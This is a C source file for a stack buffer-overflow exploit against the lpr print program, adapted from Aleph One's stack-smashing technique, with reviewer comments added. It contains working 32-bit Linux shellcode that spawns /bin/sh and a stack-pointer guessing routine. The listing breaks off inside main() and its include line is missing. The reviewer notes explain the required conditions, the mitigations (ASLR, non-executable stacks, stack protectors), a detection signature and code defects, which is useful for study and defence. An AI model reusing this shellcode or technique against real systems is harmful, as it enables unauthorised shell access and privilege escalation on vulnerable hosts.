/*
 * lpr_exploit.c - Buffer overflow exploit for the lpr program.
 * Adapted from code found in "stack smashing..." by Aleph One
 * aleph1@underground.org
 *
 * "wisdom is knowledge passed from one to another", Thanks
 * Aleph1
 *
 * This program takes advantage of the buffer overflow condition
 * present in the lpr program. This program is meant as demonstration
 * only, and the author claims no responsibility for its use or
 * misuse. - a42n8k9
 *
 * Reviewer notes:
 *  - The listing is incomplete: the header name after #include is missing
 *    and main() is cut off inside its first loop, so only the setup is
 *    visible here.
 *  - The visible code relies on two properties of the target: a stack
 *    address that can be predicted from another process (see the
 *    get_sp() - offset computation in main) and a stack from which
 *    injected bytes can execute. Address-space layout randomisation,
 *    non-executable stacks and stack protectors each remove one of those
 *    assumptions; the root-cause fix is bounds checking in the
 *    overflowing copy in lpr itself.
 */
/* NOTE(review): header name lost from this listing; malloc/exit and printf
 * are used below, so presumably <stdlib.h> and <stdio.h> - confirm. */
#include
/* Fixed distance subtracted from this process's stack pointer in main(). */
#define DEFAULT_OFFSET 1023
/* Size in bytes of the heap buffer allocated in main(). */
#define DEFAULT_BUFFER_SIZE 2289
/* x86 single-byte no-op opcode; not referenced in the visible part of the
 * file (presumably used as padding after the cut-off point). */
#define NOP 0x90

/*
 * The hex representation of the code to produce an interactive shell.
 * Obviously since this is for a Linux Box, you may need to generate the
 * right set for your OS if you are porting this to another UNIX system.
 *
 * Detection note: the byte string ends in the literal "/bin/sh" and
 * contains the \xcd\x80 pair (the 32-bit Linux x86 system-call
 * instruction), which makes it straightforward signature material for
 * network or host inspection of lpr arguments.
 */
char shellcode [] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Copies the stack pointer register into eax via inline assembly.
 *
 * NOTE(review): there is no return statement; the caller uses whatever
 * the asm left in eax. Using the value of a non-void function that falls
 * off its end is undefined behaviour in C, and the asm is 32-bit x86 only.
 */
unsigned long get_sp(void) {
    __asm__("mov %esp,%eax");
}

/*
 * Entry point: allocates the buffer and derives a stack address from this
 * process's own stack pointer. The remainder of the function is not
 * visible in this listing.
 *
 * NOTE(review): `void main` is non-standard (main should return int), and
 * argc/argv are unused in the visible part.
 */
void main(int argc, char *argv[]) {
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
    int i;

    /* set aside the memory for our shell code */
    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        /* NOTE(review): exits with status 0 (success) on allocation failure. */
        exit(0);
    }

    /* Get the address of our stack pointer */
    /* The guess is this process's stack pointer minus a fixed offset, so it
     * only holds where stack addresses are the same across processes. */
    addr = get_sp() - offset;

    /* fill our buffer with its address */
    /* The buffer is viewed as an array of long; the loop that follows is
     * cut off in this listing. */
    ptr = buff;
    addr_ptr = (long *)ptr;
    for(i = 0; i